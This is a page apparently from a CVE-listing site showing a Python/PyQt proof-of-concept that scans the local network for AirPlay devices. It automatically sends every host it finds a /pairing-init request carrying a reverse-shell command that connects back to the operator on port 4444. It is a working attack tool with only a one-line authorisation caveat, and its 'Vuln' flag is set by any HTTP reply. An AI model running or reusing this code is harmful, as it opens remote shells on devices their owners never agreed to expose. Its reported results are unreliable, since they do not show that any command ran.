4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / main.py PY
import sys
import socket
import threading
import time
from PyQt5 import QtWidgets, QtCore, QtGui

from zeroconf import Zeroconf, ServiceBrowser, ServiceListener

# === CONFIG ===
# Local address used for outbound traffic: a UDP socket is connect()ed to
# 8.8.8.8:80 and the address it was bound to is read back with getsockname().
# NOTE(review): the socket created here is never closed, and this expression
# runs at import time, so any exception from connect() propagates out of the
# import itself.
ATTACKER_IP = (lambda: (lambda s: (s.connect(("8.8.8.8", 80)), s.getsockname()[0])[1])(socket.socket(socket.AF_INET, socket.SOCK_DGRAM)))()
# Port number interpolated, together with ATTACKER_IP, into the request body
# built by ScannerThread.test_device.
ATTACKER_PORT = 4444
# TCP port on each discovered host that ScannerThread.test_device connects to.
TARGET_PORT = 7000

# When true, debug() prints its messages to stdout.
DEBUG = True

def debug(msg):
    """Print *msg* prefixed with ``[DEBUG]`` when the module-level DEBUG flag is set."""
    if not DEBUG:
        return
    print(f"[DEBUG] {msg}")

# --- Zeroconf listener ---
class AirPlayListener(ServiceListener):
    """Zeroconf listener that reports each newly seen host to a scanner object.

    The scanner passed to the constructor is expected to expose a ``seen`` set,
    a ``deviceFound`` signal and a ``test_device`` callable; all three are used
    in ``add_service``.
    """

    def __init__(self, scanner):
        """Remember the scanner that receives discovery results."""
        self.scanner = scanner

    def add_service(self, zc, svc_type, name):
        """Handle a service announcement.

        Resolves the service, skips it when it has no address, is a 127.x
        address, or its IP is already in ``scanner.seen``; otherwise builds a
        device dict, emits it through ``scanner.deviceFound`` and starts a
        daemon thread running ``scanner.test_device`` on it.
        """
        info = zc.get_service_info(svc_type, name)
        if not info or not info.addresses:
            return
        # Only the first advertised address is used; inet_ntoa expects a
        # packed 4-byte IPv4 address.
        ip = socket.inet_ntoa(info.addresses[0])
        if ip.startswith("127.") or ip in self.scanner.seen:
            return
        self.scanner.seen.add(ip)
        # Instance label: everything before the first dot of the service name.
        inst = name.split('.')[0]
        # Copy the service properties into a str -> str dict.
        props = {}
        for k, v in info.properties.items():
            try:
                key = k.decode() if isinstance(k, bytes) else str(k)
                val = v.decode() if isinstance(v, bytes) else str(v)
                props[key] = val
            # NOTE(review): bare except silently drops any property whose
            # key/value fails to convert, and hides every other error too.
            except:
                continue
        dev = {"name": inst, "ip": ip, "rce": False}
        # NOTE(review): a property named "name", "ip" or "rce" overwrites the
        # corresponding entry set on the line above.
        dev.update(props)
        debug(f"Discovered {inst}@{ip} with props {list(props.keys())}")
        # A copy is emitted; the original dict is handed to the test thread,
        # which mutates it.
        self.scanner.deviceFound.emit(dev.copy())
        # NOTE(review): every host that passes the filters above is probed
        # immediately, with no confirmation step.
        threading.Thread(target=self.scanner.test_device, args=(dev,), daemon=True).start()

    # Service updates are handled exactly like new services (the ``seen`` check
    # in add_service makes repeat announcements for a known IP a no-op).
    update_service = add_service
    def remove_service(self, *args, **kwargs):
        """Ignore service removals."""
        pass

# --- Scanner thread ---
class ScannerThread(QtCore.QThread):
    """Qt thread that browses for ``_airplay._tcp.local.`` services until stopped.

    Also provides ``test_device``, which sends a request to a single host and
    reports the outcome through ``deviceTested``.
    """

    # Not emitted inside this class; the listener created in run() emits it
    # with a device dict.
    deviceFound = QtCore.pyqtSignal(dict)
    # Emitted at the end of test_device() with a copy of the device dict.
    deviceTested = QtCore.pyqtSignal(dict)

    def __init__(self):
        """Initialise the set of already-seen IPs and the stop flag."""
        super().__init__()
        # IP strings that have already been reported.
        self.seen = set()
        # Set to True by stop(); polled by run().
        self._stop = False

    def run(self):
        """Start a Zeroconf service browser and idle until ``stop()`` is called."""
        debug("ScannerThread starting")
        zc = Zeroconf()
        ServiceBrowser(zc, "_airplay._tcp.local.", AirPlayListener(self))
        try:
            # Poll the stop flag every 100 ms; the browser is driven by the
            # listener callbacks, not by this loop.
            while not self._stop:
                time.sleep(0.1)
        finally:
            zc.close()
            debug("ScannerThread stopped")

    def stop(self):
        """Ask ``run()`` to leave its polling loop."""
        self._stop = True

    def test_device(self, dev):
        """Send one HTTP POST to ``dev["ip"]`` and record whether it answered.

        Sets ``dev["rce"]`` to True when the first bytes of the reply are
        ``HTTP``, then emits a copy of ``dev`` through ``deviceTested``.
        Connection errors are logged via ``debug`` and otherwise ignored.

        NOTE(review): the request body carries a shell command pointing back
        at ATTACKER_IP:ATTACKER_PORT. Only run this against hosts you are
        authorised to test.
        """
        ip = dev["ip"]
        debug(f"RCE test on {ip}")
        # XML property list whose single string value is the shell command.
        xml = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>launchctl</key>
    <string>/bin/sh -i >& /dev/tcp/{ATTACKER_IP}/{ATTACKER_PORT} 0>&1</string>
</dict>
</plist>
"""
        # NOTE(review): the Content-Type header announces a binary plist while
        # the body is XML text. Content-Length is the character count of the
        # str, which matches the encoded byte length only for ASCII content.
        req = (
            f"POST /pairing-init HTTP/1.1\r\n"
            f"Host: {ip}\r\n"
            "Content-Type: application/x-apple-binary-plist\r\n"
            f"Content-Length: {len(xml)}\r\n"
            "Connection: close\r\n\r\n"
            + xml
        ).encode()
        try:
            s = socket.socket()
            s.settimeout(5)
            s.connect((ip, TARGET_PORT))
            s.sendall(req)
            resp = s.recv(4096)
            debug(f"RCE resp: {resp[:64]!r}")
            # NOTE(review): this check only looks at the start of the reply,
            # so any HTTP response, including an error status, sets the flag.
            # It does not show that the command in the body was executed.
            if resp.startswith(b"HTTP"):
                dev["rce"] = True
                debug("-> Marked RCE Vulnerable")
        except Exception as e:
            debug(f"RCE error: {e}")
        finally:
            # NOTE(review): if socket.socket() itself raised, ``s`` is unbound
            # here and the bare except hides the resulting NameError.
            try: s.close()
            except: pass
        self.deviceTested.emit(dev.copy())

# --- GUI ---
class MainWindow(QtWidgets.QMainWindow):
    """Main window: a two-column tree of discovered devices and their status.

    A ``ScannerThread`` is created and started in the constructor. Its
    ``deviceFound`` and ``deviceTested`` signals feed ``add_item`` and
    ``update_item``. The thread is stopped and joined when the window closes.
    """

    def __init__(self):
        """Build the tree widget, wire up the scanner signals and start scanning."""
        super().__init__()
        self.setWindowTitle("AirPlay Scanner PoC")
        self.resize(600, 400)

        # Most recent device dict per host, keyed by IP string.
        self.device_info = {}

        self.tree = QtWidgets.QTreeWidget()
        self.tree.setColumnCount(2)
        self.tree.setHeaderLabels(["Device", "RCE"])
        self.tree.header().setSectionResizeMode(
            QtWidgets.QHeaderView.ResizeToContents
        )
        self.tree.itemClicked.connect(self.expand_info)
        self.setCentralWidget(self.tree)

        self.scanner = ScannerThread()
        self.scanner.deviceFound.connect(self.add_item)
        self.scanner.deviceTested.connect(self.update_item)
        self.scanner.start()

    def closeEvent(self, event):
        """Stop the scanner thread before the window goes away.

        Without this the QThread object is destroyed while its ``run()`` loop
        is still executing, which Qt reports as a fatal error at shutdown.
        """
        self.scanner.stop()
        # run() polls its stop flag every 100 ms; the timeout keeps the GUI
        # thread from blocking forever if shutdown of the browser stalls.
        self.scanner.wait(5000)
        super().closeEvent(event)

    @QtCore.pyqtSlot(dict)
    def add_item(self, d):
        """Add a top-level row for a newly discovered device.

        ``d`` must contain the keys ``'ip'`` and ``'name'``. The IP is stored
        on the row under ``Qt.UserRole`` so later updates can find it.
        """
        ip = d['ip']
        self.device_info[ip] = d.copy()
        it = QtWidgets.QTreeWidgetItem([f"{d['name']} ({ip})", "Scanning..."])
        it.setData(0, QtCore.Qt.UserRole, ip)
        # Show the expand arrow even though children are only created on click.
        it.setChildIndicatorPolicy(QtWidgets.QTreeWidgetItem.ShowIndicator)
        self.tree.addTopLevelItem(it)

    @QtCore.pyqtSlot(dict)
    def update_item(self, d):
        """Store the tested device dict and update its row's status column.

        The row is located by the IP saved under ``Qt.UserRole``. If no row
        matches, only ``device_info`` is updated.
        """
        ip = d['ip']
        self.device_info[ip] = d.copy()
        for i in range(self.tree.topLevelItemCount()):
            it = self.tree.topLevelItem(i)
            if it.data(0, QtCore.Qt.UserRole) == ip:
                it.setText(1, "Vuln" if d['rce'] else "Safe")
                color = "red" if d['rce'] else "green"
                it.setForeground(1, QtGui.QBrush(QtGui.QColor(color)))
                break

    def expand_info(self, item, col):
        """Rebuild and expand the clicked row's children from ``device_info``.

        Each key/value pair of the stored device dict becomes one child row.
        Items with no stored device (e.g. the child rows themselves, which
        carry no IP) are ignored. ``col`` is supplied by the signal and unused.
        """
        ip = item.data(0, QtCore.Qt.UserRole)
        dev = self.device_info.get(ip)
        if not dev:
            return
        # Drop children from any previous click so entries are not duplicated.
        item.takeChildren()
        for key, val in dev.items():
            child = QtWidgets.QTreeWidgetItem([f"{key}: {val}"])
            item.addChild(child)
        item.setExpanded(True)

# --- Entry point ---
def main():
    """Create the Qt application, show the main window and exit with the event loop's status."""
    application = QtWidgets.QApplication(sys.argv)
    main_window = MainWindow()
    main_window.show()
    exit_status = application.exec_()
    sys.exit(exit_status)

# Script entry point: log start-up, then hand control to main().
if __name__ == "__main__":
    debug("Starting AirPlay Scanner PoC")
    main()